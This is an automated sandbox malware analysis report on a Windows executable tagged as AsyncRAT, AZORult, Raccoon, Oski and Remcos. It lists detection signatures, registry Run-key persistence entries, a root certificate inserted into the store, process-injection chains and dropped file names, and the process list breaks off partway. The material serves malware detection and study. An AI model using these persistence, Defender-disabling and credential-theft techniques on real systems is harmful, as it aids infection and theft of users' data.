Malware Analysis Report

2024-09-22 22:02

Sample ID 210813-fsvebh2l46
Target ED4D2E0F901BC478BE16D3DAD0D02792.exe
SHA256 959e3ca2579b6be8a11c06763c5a34ec118abc96d869e25bef06319c92da465e
Tags
asyncrat azorult oski raccoon remcos 08082021 fe25b858c52ebb889260990dc343e5dbcf4a96e4 discovery infostealer persistence rat spyware stealer suricata trojan evasion
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

959e3ca2579b6be8a11c06763c5a34ec118abc96d869e25bef06319c92da465e

Threat Level: Known bad

The file ED4D2E0F901BC478BE16D3DAD0D02792.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat azorult oski raccoon remcos 08082021 fe25b858c52ebb889260990dc343e5dbcf4a96e4 discovery infostealer persistence rat spyware stealer suricata trojan evasion

Contains code to disable Windows Defender

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Raccoon Stealer Payload

Raccoon

Azorult

Modifies Windows Defender Real-time Protection settings

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M16

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

Remcos

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M1

Oski

AsyncRat

Async RAT payload

Blocklisted process makes network request

Executes dropped EXE

Downloads MZ/PE file

Reads user/profile data of web browsers

Loads dropped DLL

Deletes itself

Reads user/profile data of local email clients

Windows security modification

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: MapViewOfSection

Kills process with taskkill

Modifies registry key

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

MITRE ATT&CK Matrix V6

Analysis: static1

Detonation Overview

Reported

2021-08-13 07:57

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-08-13 07:57

Reported

2021-08-13 08:03

Platform

win7v20210410

Max time kernel

146s

Max time network

203s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

Signatures

AsyncRat

rat asyncrat

Azorult

trojan infostealer azorult

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Oski

infostealer oski

Raccoon

stealer raccoon

Raccoon Stealer Payload

Description Indicator Process Target
N/A N/A N/A N/A

Remcos

rat remcos

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

suricata

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M1

suricata

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\Jjdsdpr = "C:\\Users\\Public\\Libraries\\rpdsdjJ.url" C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bdojytw = "C:\\Users\\Public\\Libraries\\wtyjodB.url" C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe N/A

Checks installed software on the system

discovery

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\GFDyrtucbvfdg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1028 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1028 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1028 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1028 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1736 wrote to memory of 1704 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1736 wrote to memory of 1704 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1736 wrote to memory of 1704 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1736 wrote to memory of 1704 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1736 wrote to memory of 1704 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1028 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1028 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1028 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1028 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1028 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 1028 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 1028 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 1028 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 1028 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 1532 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe
PID 1532 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe
PID 1532 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe
PID 1532 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe
PID 1532 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe
PID 1532 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe
PID 1532 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe
PID 1532 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe
PID 1532 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe
PID 1532 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe
PID 1532 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe
PID 1532 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe
PID 1532 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe
PID 1532 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe
PID 1532 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe
PID 1532 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe
PID 1532 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe
PID 1532 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe
PID 1532 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe
PID 1532 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe
PID 1532 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 1532 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 1532 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 1532 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 1780 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1780 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1780 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1780 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1716 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe C:\Windows\SysWOW64\logagent.exe
PID 1716 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe C:\Windows\SysWOW64\logagent.exe
PID 1716 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe C:\Windows\SysWOW64\logagent.exe
PID 1716 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe C:\Windows\SysWOW64\logagent.exe
PID 1716 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe C:\Windows\SysWOW64\logagent.exe
PID 1716 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe C:\Windows\SysWOW64\logagent.exe
PID 1716 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe C:\Windows\SysWOW64\logagent.exe
PID 1716 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe C:\Windows\SysWOW64\logagent.exe
PID 1716 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe C:\Windows\SysWOW64\logagent.exe
PID 1716 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe C:\Windows\SysWOW64\logagent.exe
PID 1716 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe C:\Windows\SysWOW64\logagent.exe
PID 1716 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe C:\Windows\SysWOW64\logagent.exe
PID 1716 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe C:\Windows\SysWOW64\logagent.exe
PID 1716 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe C:\Windows\SysWOW64\logagent.exe
PID 1716 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe C:\Windows\SysWOW64\logagent.exe
PID 1716 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe C:\Windows\SysWOW64\logagent.exe
PID 1716 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe C:\Windows\SysWOW64\cmd.exe
PID 1716 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe

